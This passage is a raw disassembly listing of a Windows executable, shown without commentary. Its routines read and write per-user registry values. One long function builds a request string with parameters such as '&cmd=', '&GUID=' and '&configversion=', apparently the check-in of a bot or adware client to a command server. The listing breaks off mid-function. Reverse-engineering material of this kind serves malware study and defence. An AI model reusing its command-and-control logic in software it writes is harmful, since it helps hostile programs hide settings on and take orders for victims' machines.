add ecx, 38h
push ecx
mov ecx, [ebp+arg_0]
call dword_433180
mov edx, [ebp+var_1C]
or edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+arg_0]
loc_427C7E: ; CODE XREF: sub_427B23+101�j
; sub_427B23+13D�j
mov esp, ebp
pop ebp
retn 4
sub_427B23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427C84 proc near ; CODE XREF: HLXc:00427E7E�p
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
add ecx, 4
push ecx
push 0
push 20006h
push 0
push offset dword_439CE4
push 0
mov ecx, [ebp+var_8]
add ecx, 18h
call dword_433188
push eax
mov edx, [ebp+var_8]
mov eax, [edx]
push eax
call dword_43300C ; RegCreateKeyExA
test eax, eax
jz short loc_427CC7
jmp short loc_427D1D
; ---------------------------------------------------------------------------
loc_427CC7: ; CODE XREF: sub_427C84+3F�j
mov ecx, [ebp+var_8]
add ecx, 28h
call dword_43318C
add eax, 1
push eax
mov ecx, [ebp+var_8]
add ecx, 28h
call dword_433188
push eax
push 1
push 0
mov ecx, [ebp+var_8]
add ecx, 8
call dword_433188
push eax
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
push edx
call dword_433008 ; RegSetValueExA
test eax, eax
jnz short loc_427D10
mov eax, [ebp+var_8]
mov dword ptr [eax+48h], 1
loc_427D10: ; CODE XREF: sub_427C84+80�j
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
push edx
call dword_433000 ; RegCloseKey
loc_427D1D: ; CODE XREF: sub_427C84+41�j
mov esp, ebp
pop ebp
retn
sub_427C84 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_4325CE
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 20h
mov [ebp-24h], ecx
mov eax, [ebp-24h]
cmp dword ptr [eax+48h], 0
jz short loc_427D5F
mov ecx, [ebp-24h]
cmp dword ptr [ecx+4Ch], 0
jnz short loc_427D5F
mov ecx, [ebp-24h]
add ecx, 28h
call dword_433188
jmp short loc_427D9A
; ---------------------------------------------------------------------------
loc_427D5F: ; CODE XREF: HLXc:00427D46�j
; HLXc:00427D4F�j
lea edx, [ebp-20h]
push edx
mov ecx, [ebp-24h]
call sub_427B23
mov [ebp-28h], eax
mov eax, [ebp-28h]
mov [ebp-2Ch], eax
mov dword ptr [ebp-4], 0
mov ecx, [ebp-2Ch]
call dword_433188
mov [ebp-10h], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-20h]
call dword_433168
mov eax, [ebp-10h]
loc_427D9A: ; CODE XREF: HLXc:00427D5D�j
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
mov [ebp-8], ecx
mov dword ptr [ebp-4], 0
mov eax, [ebp-8]
cmp dword ptr [eax+48h], 0
jz short loc_427DE7
mov ecx, [ebp-8]
cmp dword ptr [ecx+4Ch], 0
jnz short loc_427DE7
mov edx, [ebp-8]
add edx, 28h
push edx
mov ecx, [ebp+8]
call dword_433180
mov eax, [ebp-4]
or al, 1
mov [ebp-4], eax
mov eax, [ebp+8]
jmp short loc_427DFF
; ---------------------------------------------------------------------------
loc_427DE7: ; CODE XREF: HLXc:00427DBF�j
; HLXc:00427DC8�j
mov ecx, [ebp+8]
push ecx
mov ecx, [ebp-8]
call sub_427B23
mov edx, [ebp-4]
or edx, 1
mov [ebp-4], edx
mov eax, [ebp+8]
loc_427DFF: ; CODE XREF: HLXc:00427DE5�j
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_4325E2
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
mov [ebp-18h], ecx
mov dword ptr [ebp-4], 0
mov eax, [ebp-18h]
add eax, 28h
push eax
lea ecx, [ebp+8]
push ecx
call dword_433190
add esp, 8
and eax, 0FFh
test eax, eax
jz short loc_427E6B
mov edx, [ebp-18h]
cmp dword ptr [edx+4Ch], 0
jnz short loc_427E6B
mov eax, [ebp-18h]
mov [ebp-10h], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call dword_433168
mov eax, [ebp-10h]
jmp short loc_427E9C
; ---------------------------------------------------------------------------
loc_427E6B: ; CODE XREF: HLXc:00427E45�j
; HLXc:00427E4E�j
lea ecx, [ebp+8]
push ecx
mov ecx, [ebp-18h]
add ecx, 28h
call dword_43317C
mov ecx, [ebp-18h]
call sub_427C84
mov edx, [ebp-18h]
mov [ebp-14h], edx
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call dword_433168
mov eax, [ebp-14h]
loc_427E9C: ; CODE XREF: HLXc:00427E69�j
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_4325F5
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp-10h], ecx
mov ecx, [ebp-10h]
call sub_428440
mov dword ptr [ebp-4], 0
mov eax, [ebp-10h]
mov dword ptr [eax+28h], 0
mov ecx, [ebp-10h]
mov dword ptr [ecx+2Ch], 0
push offset dword_439CE8
mov ecx, [ebp-10h]
add ecx, 8
call dword_433194
mov edx, [ebp-10h]
mov dword ptr [edx], 80000001h
mov eax, [ebp-10h]
mov dword ptr [eax+30h], 0
mov ecx, [ebp-10h]
mov dword ptr [ecx+34h], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-10h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_432626
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 38h
mov [ebp-34h], ecx
mov dword ptr [ebp-4], 0
mov ecx, [ebp-34h]
call sub_428440
mov byte ptr [ebp-4], 1
mov eax, [ebp-34h]
mov dword ptr [eax+28h], 0
mov ecx, [ebp-34h]
mov edx, [ebp+18h]
mov [ecx+2Ch], edx
mov eax, [ebp-34h]
mov ecx, [ebp+1Ch]
mov [eax+34h], ecx
mov edx, [ebp-34h]
mov eax, [ebp+20h]
mov [edx], eax
mov ecx, [ebp-34h]
mov dword ptr [ecx+30h], 0
mov edx, dword_433178
mov eax, [edx]
push eax
push 5Ch
lea ecx, [ebp+8]
call dword_433174
mov [ebp-10h], eax
mov ecx, [ebp-10h]
push ecx
push 0
lea edx, [ebp-20h]
push edx
lea ecx, [ebp+8]
call dword_433170
mov [ebp-38h], eax
mov eax, [ebp-38h]
mov [ebp-3Ch], eax
mov byte ptr [ebp-4], 2
mov ecx, [ebp-3Ch]
push ecx
mov ecx, [ebp-34h]
add ecx, 18h
call dword_43317C
mov byte ptr [ebp-4], 1
lea ecx, [ebp-20h]
call dword_433168
mov edx, dword_433178
mov eax, [edx]
push eax
mov ecx, [ebp-10h]
add ecx, 1
push ecx
lea edx, [ebp-30h]
push edx
lea ecx, [ebp+8]
call dword_433170
mov [ebp-40h], eax
mov eax, [ebp-40h]
mov [ebp-44h], eax
mov byte ptr [ebp-4], 3
mov ecx, [ebp-44h]
push ecx
mov ecx, [ebp-34h]
add ecx, 8
call dword_43317C
mov byte ptr [ebp-4], 1
lea ecx, [ebp-30h]
call dword_433168
mov ecx, [ebp-34h]
call sub_428069
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call dword_433168
mov eax, [ebp-34h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 1Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov ecx, [ebp-4]
call sub_4284A0
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428069 proc near ; CODE XREF: HLXc:0042802E�p
; HLXc:004281BE�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
add eax, 4
push eax
push 20019h
push 0
mov ecx, [ebp+var_C]
add ecx, 18h
call dword_433188
push eax
mov ecx, [ebp+var_C]
mov edx, [ecx]
push edx
call dword_433004 ; RegOpenKeyExA
test eax, eax
jnz short loc_428107
mov [ebp+var_4], 4
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_C]
add ecx, 28h
push ecx
lea edx, [ebp+var_8]
push edx
push 0
mov ecx, [ebp+var_C]
add ecx, 8
call dword_433188
push eax
mov eax, [ebp+var_C]
mov ecx, [eax+4]
push ecx
call dword_433010 ; RegQueryValueExA
test eax, eax
jnz short loc_4280F2
mov edx, [ebp+var_C]
mov dword ptr [edx+30h], 1
mov eax, [ebp+var_C]
mov ecx, [eax+4]
push ecx
call dword_433000 ; RegCloseKey
mov edx, [ebp+var_C]
mov eax, [edx+28h]
jmp short loc_42810D
; ---------------------------------------------------------------------------
loc_4280F2: ; CODE XREF: sub_428069+68�j
mov eax, [ebp+var_C]
mov ecx, [eax+4]
push ecx
call dword_433000 ; RegCloseKey
mov edx, [ebp+var_C]
mov eax, [edx+2Ch]
jmp short loc_42810D
; ---------------------------------------------------------------------------
loc_428107: ; CODE XREF: sub_428069+32�j
mov eax, [ebp+var_C]
mov eax, [eax+2Ch]
loc_42810D: ; CODE XREF: sub_428069+87�j
; sub_428069+9C�j
mov esp, ebp
pop ebp
retn
sub_428069 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
mov [ebp-8], ecx
lea eax, [ebp-4]
push eax
mov ecx, [ebp-8]
add ecx, 4
push ecx
push 0
push 20006h
push 0
push offset dword_439CEC
push 0
mov ecx, [ebp-8]
add ecx, 18h
call dword_433188
push eax
mov edx, [ebp-8]
mov eax, [edx]
push eax
call dword_43300C ; RegCreateKeyExA
test eax, eax
jz short loc_428154
jmp short loc_428196
; ---------------------------------------------------------------------------
loc_428154: ; CODE XREF: HLXc:00428150�j
push 4
mov ecx, [ebp-8]
add ecx, 28h
push ecx
push 4
push 0
mov ecx, [ebp-8]
add ecx, 8
call dword_433188
push eax
mov edx, [ebp-8]
mov eax, [edx+4]
push eax
call dword_433008 ; RegSetValueExA
test eax, eax
jnz short loc_428189
mov ecx, [ebp-8]
mov dword ptr [ecx+30h], 1
loc_428189: ; CODE XREF: HLXc:0042817D�j
mov edx, [ebp-8]
mov eax, [edx+4]
push eax
call dword_433000 ; RegCloseKey
loc_428196: ; CODE XREF: HLXc:00428152�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
cmp dword ptr [eax+30h], 0
jz short loc_4281BB
mov ecx, [ebp-4]
cmp dword ptr [ecx+34h], 0
jnz short loc_4281BB
mov edx, [ebp-4]
mov eax, [edx+28h]
jmp short loc_4281C3
; ---------------------------------------------------------------------------
loc_4281BB: ; CODE XREF: HLXc:004281A8�j
; HLXc:004281B1�j
mov ecx, [ebp-4]
call sub_428069
loc_4281C3: ; CODE XREF: HLXc:004281B9�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4281D0 proc near ; CODE XREF: HLXc:0042651F�p
; sub_426584+29�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_4281D0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov ecx, [ebp+var_10]
add ecx, 8
call sub_43164E
mov [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 0Ch
call sub_43164E
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_4281D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428230 proc near ; CODE XREF: sub_4266D6+A�p
; sub_426ABF+47�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_428230
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 0Ch
call sub_431642
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
add ecx, 8
call sub_431642
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_428230 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428280 proc near ; CODE XREF: sub_426584+BF�p
; sub_42692B+E9�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_4282A0
mov eax, [eax+4]
mov esp, ebp
pop ebp
retn
sub_428280 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4282A0 proc near ; CODE XREF: sub_428280+A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov eax, [eax]
sub eax, 0Ch
mov esp, ebp
pop ebp
retn
sub_4282A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4282C0 proc near ; CODE XREF: sub_426DB8+30�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
call sub_4226A0
push eax
mov ecx, [ebp+arg_0]
call sub_4282E0
neg eax
sbb eax, eax
inc eax
pop ebp
retn 8
sub_4282C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4282E0 proc near ; CODE XREF: sub_4282C0+F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
mov edx, [ecx]
push edx
call sub_428300
add esp, 8
mov esp, ebp
pop ebp
retn 4
sub_4282E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428300 proc near ; CODE XREF: sub_4282E0+11�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_433204 ; _mbscmp
add esp, 8
pop ebp
retn
sub_428300 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428320 proc near ; CODE XREF: HLXc:00426EA6�p
; HLXc:00426ED2�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+arg_4]
mov [edx+4], eax
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_8]
mov [ecx+8], edx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_C]
mov [eax+0Ch], ecx
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 10h
sub_428320 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428360 proc near ; CODE XREF: sub_4270ED+AA�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
push ecx
call dword_433294 ; CopyRect
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_428360 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428380 proc near ; CODE XREF: HLXc:0042737A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
push ecx
call dword_433290 ; EqualRect
mov esp, ebp
pop ebp
retn 4
sub_428380 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4283A0 proc near ; CODE XREF: HLXc:00426E8B�p
; HLXc:00426E96�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4283A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4283B0 proc near ; CODE XREF: HLXc:00427409�p
; HLXc:00427423�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+arg_4]
mov [edx+4], eax
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 8
sub_4283B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4283E0 proc near ; CODE XREF: sub_427610+B0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+arg_4]
mov [eax+4], edx
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 8
sub_4283E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428400 proc near ; CODE XREF: HLXc:0042785E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [eax]
cmp ecx, [ebp+arg_0]
jnz short loc_428427
mov edx, [ebp+var_4]
mov eax, [edx+4]
cmp eax, [ebp+arg_4]
jnz short loc_428427
mov [ebp+var_8], 1
jmp short loc_42842E
; ---------------------------------------------------------------------------
loc_428427: ; CODE XREF: sub_428400+11�j
; sub_428400+1C�j
mov [ebp+var_8], 0
loc_42842E: ; CODE XREF: sub_428400+25�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn 8
sub_428400 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428440 proc near ; CODE XREF: HLXc:004278B6�p
; HLXc:0042797A�p ...
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_428440
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
mov [ebp+var_18], ecx
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_18]
add ecx, 8
call dword_43316C
mov [ebp+var_4], 0
lea ecx, [ebp+var_14]
push ecx
mov ecx, [ebp+var_18]
add ecx, 18h
call dword_43316C
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_18]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_428440 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4284A0 proc near ; CODE XREF: HLXc:00427B10�p
; HLXc:00428060�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_4284A0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 18h
call dword_433168
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
add ecx, 8
call dword_433168
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_4284A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4284F0 proc near ; DATA XREF: HLXc:00437004�o
push ebp
mov ebp, esp
call sub_4284FF
call sub_42850E
pop ebp
retn
sub_4284F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4284FF proc near ; CODE XREF: sub_4284F0+3�p
push ebp
mov ebp, esp
mov ecx, offset dword_439CF0
call sub_4298B0
pop ebp
retn
sub_4284FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42850E proc near ; CODE XREF: sub_4284F0+8�p
push ebp
mov ebp, esp
push offset sub_428520
call sub_4317A2
add esp, 4
pop ebp
retn
sub_42850E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428520 proc near ; DATA XREF: sub_42850E+3�o
push ebp
mov ebp, esp
mov ecx, offset dword_439CF0
call sub_429830
pop ebp
retn
sub_428520 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42852F proc near ; CODE XREF: sub_4294E5+F9�p
var_28C8 = dword ptr -28C8h
var_28C4 = dword ptr -28C4h
var_28C0 = dword ptr -28C0h
var_28BC = dword ptr -28BCh
var_28B6 = word ptr -28B6h
var_28B4 = dword ptr -28B4h
var_28B0 = dword ptr -28B0h
var_28AC = dword ptr -28ACh
var_28A8 = dword ptr -28A8h
var_28A4 = dword ptr -28A4h
var_28A0 = dword ptr -28A0h
var_289C = dword ptr -289Ch
var_2898 = dword ptr -2898h
var_2894 = dword ptr -2894h
var_2890 = dword ptr -2890h
var_288C = dword ptr -288Ch
var_2888 = dword ptr -2888h
var_2884 = dword ptr -2884h
var_2880 = dword ptr -2880h
var_287C = dword ptr -287Ch
var_2878 = dword ptr -2878h
var_2874 = dword ptr -2874h
var_2870 = dword ptr -2870h
var_286C = dword ptr -286Ch
var_2868 = dword ptr -2868h
var_2864 = dword ptr -2864h
var_2860 = dword ptr -2860h
var_285C = dword ptr -285Ch
var_2858 = dword ptr -2858h
var_2854 = dword ptr -2854h
var_2850 = dword ptr -2850h
var_284C = dword ptr -284Ch
var_2848 = dword ptr -2848h
var_2844 = dword ptr -2844h
var_2840 = dword ptr -2840h
var_283C = dword ptr -283Ch
var_2838 = dword ptr -2838h
var_2834 = dword ptr -2834h
var_2830 = dword ptr -2830h
var_282C = dword ptr -282Ch
var_2828 = dword ptr -2828h
var_2824 = dword ptr -2824h
var_2820 = dword ptr -2820h
var_281C = dword ptr -281Ch
var_2818 = dword ptr -2818h
var_2814 = dword ptr -2814h
var_2810 = dword ptr -2810h
var_280C = dword ptr -280Ch
var_2808 = dword ptr -2808h
var_2804 = byte ptr -2804h
var_2800 = dword ptr -2800h
var_27FC = dword ptr -27FCh
var_27F8 = byte ptr -27F8h
var_27F4 = dword ptr -27F4h
var_27F0 = byte ptr -27F0h
var_27EC = byte ptr -27ECh
var_27E8 = byte ptr -27E8h
var_27E4 = byte ptr -27E4h
var_27E0 = byte ptr -27E0h
var_27DC = byte ptr -27DCh
var_27D8 = byte ptr -27D8h
var_27D4 = byte ptr -27D4h
var_27D0 = byte ptr -27D0h
var_27CC = byte ptr -27CCh
var_27C8 = byte ptr -27C8h
var_27C4 = byte ptr -27C4h
var_27C0 = byte ptr -27C0h
var_27BC = byte ptr -27BCh
var_27B8 = byte ptr -27B8h
var_27B4 = dword ptr -27B4h
var_27B0 = byte ptr -27B0h
var_27AC = byte ptr -27ACh
var_27A8 = dword ptr -27A8h
var_27A4 = dword ptr -27A4h
var_27A0 = dword ptr -27A0h
var_279C = byte ptr -279Ch
var_1F9C = byte ptr -1F9Ch
var_1F98 = dword ptr -1F98h
var_1F94 = dword ptr -1F94h
var_1F90 = byte ptr -1F90h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_42852F
mov eax, large fs:0
push eax
mov large fs:0, esp
mov eax, 28BCh
call sub_431700
mov [ebp+var_2818], ecx
mov [ebp+var_1F98], 0
mov [ebp+var_3C], 1
lea ecx, [ebp+var_20]
call sub_429930
mov [ebp+var_4], 0
lea ecx, [ebp+var_1C]
call sub_43164E
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_28]
call sub_43164E
mov byte ptr [ebp+var_4], 2
mov [ebp+var_1F94], 0
lea ecx, [ebp+var_18]
call sub_43164E
mov byte ptr [ebp+var_4], 3
mov [ebp+var_24], 0
lea ecx, [ebp+var_10]
call sub_429930
mov byte ptr [ebp+var_4], 4
lea ecx, [ebp+var_1F9C]
call sub_429930
mov byte ptr [ebp+var_4], 5
push 1Ch
call dword_4330E0 ; Sleep
mov eax, 1
test eax, eax
jz loc_428665
lea ecx, [ebp+var_1F9C]
call sub_429DD0
push eax
push offset dword_4332C8
push 1
push 0
push offset byte_4332B8
call dword_4332AC
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jge short loc_428665
mov [ebp+var_27A8], 0FFFFFFFFh
mov byte ptr [ebp+var_4], 4
lea ecx, [ebp+var_1F9C]
call sub_429DB0
mov byte ptr [ebp+var_4], 3
lea ecx, [ebp+var_10]
call sub_4264A2
mov byte ptr [ebp+var_4], 2
lea ecx, [ebp+var_18]
call sub_431642
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_28]
call sub_431642
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_1C]
call sub_431642
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_20]
call sub_42414A
mov eax, [ebp+var_27A8]
jmp loc_429081
; ---------------------------------------------------------------------------
loc_428665: ; CODE XREF: sub_42852F+A4�j
; sub_42852F+D1�j
push 1Ch
call dword_4330E0 ; Sleep
mov ecx, [ebp+var_2818]
mov edx, [ecx]
push edx
push offset aD ; "%d"
lea eax, [ebp+var_4C]
push eax
call dword_4331E0 ; sprintf
add esp, 0Ch
lea ecx, [ebp+var_4C]
push ecx
push offset asc_437578 ; "&x="
lea edx, [ebp+var_27AC]
push edx
mov ecx, [ebp+var_2818]
add ecx, 8
call sub_42583A
mov [ebp+var_281C], eax
mov eax, [ebp+var_281C]
mov [ebp+var_2820], eax
mov byte ptr [ebp+var_4], 6
mov ecx, [ebp+var_2820]
push ecx
push offset aI ; "&i="
lea edx, [ebp+var_27B0]
push edx
mov ecx, [ebp+var_2818]
add ecx, 8
call sub_425733
mov [ebp+var_2824], eax
mov eax, [ebp+var_2824]
mov [ebp+var_2828], eax
mov byte ptr [ebp+var_4], 7
mov ecx, [ebp+var_2828]
push ecx
push offset aP ; "&p="
push offset dword_43BD30
push offset aCmd ; "&cmd="
mov edx, [ebp+var_2818]
add edx, 10h
push ecx
mov ecx, esp
mov [ebp+var_27B4], esp
push edx
call sub_431636
mov [ebp+var_282C], eax
lea eax, [ebp+var_27B8]
push eax
mov ecx, [ebp+var_2818]
add ecx, 8
call sub_422F54
mov [ebp+var_2830], eax
mov ecx, [ebp+var_2830]
mov [ebp+var_2834], ecx
mov byte ptr [ebp+var_4], 8
mov edx, [ebp+var_2834]
push edx
push offset aGuid ; "&GUID="
lea eax, [ebp+var_27BC]
push eax
mov ecx, [ebp+var_2818]
add ecx, 8
call sub_4254CE
mov [ebp+var_2838], eax
mov ecx, [ebp+var_2838]
mov [ebp+var_283C], ecx
mov byte ptr [ebp+var_4], 9
mov edx, [ebp+var_283C]
push edx
push offset aConfigversion ; "&configversion="
mov eax, [ebp+var_2818]
add eax, 1Ch
push eax
push offset aVersion ; "&version="
lea ecx, [ebp+var_27C0]
push ecx
call sub_43167E
mov [ebp+var_2840], eax
mov edx, [ebp+var_2840]
mov [ebp+var_2844], edx
mov byte ptr [ebp+var_4], 0Ah
mov eax, [ebp+var_2844]
push eax
lea ecx, [ebp+var_27C4]
push ecx
call sub_43165A
mov [ebp+var_2848], eax
mov edx, [ebp+var_2848]
mov [ebp+var_284C], edx
mov byte ptr [ebp+var_4], 0Bh
mov eax, [ebp+var_284C]
push eax
lea ecx, [ebp+var_27C8]
push ecx
call sub_431654
mov [ebp+var_2850], eax
mov edx, [ebp+var_2850]
mov [ebp+var_2854], edx
mov byte ptr [ebp+var_4], 0Ch
mov eax, [ebp+var_2854]
push eax
lea ecx, [ebp+var_27CC]
push ecx
call sub_43165A
mov [ebp+var_2858], eax
